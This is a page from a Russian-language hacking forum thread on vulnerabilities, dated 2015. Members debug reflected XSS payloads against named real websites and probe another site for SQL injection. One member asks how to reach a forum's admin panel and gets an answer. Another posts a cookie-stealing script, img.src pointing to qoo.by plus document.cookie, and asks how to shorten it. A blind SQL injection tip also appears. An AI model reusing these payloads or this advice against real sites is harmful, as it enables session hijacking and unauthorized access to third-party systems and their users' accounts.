HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 32 из 296 « Первая < 22 28 29 30 31 32 33 34 35 36 4282132 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #311  
Старый 09.07.2015, 14:18
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
в таких случаях через blind парсите select info from information_schema.processlist и смотрите, почему так и как можно получить вывод
 
Ответить с цитированием

  #312  
Старый 10.07.2015, 03:02
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию
Иньекция в переменную JavaScript

Здравствуйте, подскажите, почему не выполняется alert:

Код:
Code:
http://0-99.net/?ac=2&slt=8&slr=1&lpt=1&query=\%27}%3B+alert%28%2Fxss%2F%29%3B%2F%2F%2F*&afdToken=CkAKEwjp7KW6k8_GAhVD4HIKHcuVA5gYAyAAULHPoAFosc-gAXE70B9vzKjYaJEBUbpy7KsxVDeRAXLdUtcEjNmhEhkAbTqKkDxz3zZHTsR-u1N6ySOikXD104RF&search=1
Вывод:

Код:
Code:
'searchText': '\\'}; Alert(/Xss/);///*',
-----------------------------------------------------------------------------------

Похожая проблема у меня и вот с этой xss:

Код:
Code:
http://zhannei.baidu.com/cse/search?q=\%22%3Balert%28%29%3B%2F%2F&click=1&entry=1&s=3856084255718604899&nsid=
Вывод:

Код:
Code:
pageLog["q"] = "\\\";alert();//";
 
Ответить с цитированием

  #313  
Старый 10.07.2015, 11:15
frank
Guest
Сообщений: n/a
Провел на форуме:
56887

Репутация: 28
По умолчанию
Цитата:
Сообщение от ocheretko  
ocheretko said:

Иньекция в переменную JavaScript
Здравствуйте, подскажите, почему не выполняется alert:
Код:
Code:
http://0-99.net/?ac=2&slt=8&slr=1&lpt=1&query=\%27}%3B+alert%28%2Fxss%2F%29%3B%2F%2F%2F*&afdToken=CkAKEwjp7KW6k8_GAhVD4HIKHcuVA5gYAyAAULHPoAFosc-gAXE70B9vzKjYaJEBUbpy7KsxVDeRAXLdUtcEjNmhEhkAbTqKkDxz3zZHTsR-u1N6ySOikXD104RF&search=1
Вывод:
Код:
Code:
'searchText': '\\'}; Alert(/Xss/);///*',
-----------------------------------------------------------------------------------
Похожая проблема у меня и вот с этой xss:
Код:
Code:
http://zhannei.baidu.com/cse/search?q=\%22%3Balert%28%29%3B%2F%2F&click=1&entry=1&s=3856084255718604899&nsid=
Вывод:
Код:
Code:
pageLog["q"] = "\\\";alert();//";
ну вот в этом случае

Цитата:
Сообщение от None  
экранируется ' и вы не выходите за пределы значения параметра, соответственно все воспринимается как текст(значение параметра)
 
Ответить с цитированием

  #314  
Старый 10.07.2015, 12:30
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию
мне почему то думалось, что экранирующий слеш экранируется вторым слешом, и стает не экранированным
 
Ответить с цитированием

  #315  
Старый 10.07.2015, 12:46
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от ocheretko  
ocheretko said:

мне почему то думалось, что экранирующий слеш экранируется вторым слешом, и стает не экранированным
все верно. однако alert() у вас с большой буквы, такой функции нет. а во втором случае вы как раз не выходите за пределы кавычек, там же их три - \\\"
 
Ответить с цитированием

  #316  
Старый 10.07.2015, 23:14
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
http://www.sawadee.com/lib6/gmap/gmap3_aj.php?lg=en&q=tyfghfjjjjjjjgty')

Что нибудь интересненькое сделать можно?
 
Ответить с цитированием

  #317  
Старый 11.07.2015, 14:48
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию
Что это?

http://4cheat.ru/admincp/ единственное что там интересует дак токо это throttlepostsadmin.php . При переходе кидает сюда http://4cheat.ru/admincp/throttlepostsadmin.php . Но там тупо постое окно . Что делать? .
 
Ответить с цитированием

  #318  
Старый 11.07.2015, 23:50
djon
Guest
Сообщений: n/a
Провел на форуме:
2873

Репутация: 0
По умолчанию
Можно ли скрипт img = new Image(); img.src = "http://qoo.by/3aG?"+document.cookie; укоротить до 45 символов ?
 
Ответить с цитированием

  #319  
Старый 11.07.2015, 23:56
3ran
Guest
Сообщений: n/a
Провел на форуме:
7728

Репутация: 5
По умолчанию
Цитата:
Сообщение от SaNDER  
SaNDER said:

Что это?
http://4cheat.ru/admincp/
единственное что там интересует дак токо это
throttlepostsadmin.php
. При переходе кидает сюда
http://4cheat.ru/admincp/throttlepostsadmin.php
. Но там тупо постое окно . Что делать? .
Все просто,юзай вот эту ссылку - http://4cheat.ru/modcp/
 
Ответить с цитированием

  #320  
Старый 12.07.2015, 00:00
3ran
Guest
Сообщений: n/a
Провел на форуме:
7728

Репутация: 5
По умолчанию
Цитата:
Сообщение от djon  
djon said:

Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG?
"+document.cookie; укоротить до 45 символов ?
Проще будет отредактировать максимальное количество вводимых символов в исходном коде.

Да,и js не запустится через сократитель ссылок
 
Ответить с цитированием
Ответ
Страница 32 из 296 « Первая < 22 28 29 30 31 32 33 34 35 36 4282132 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ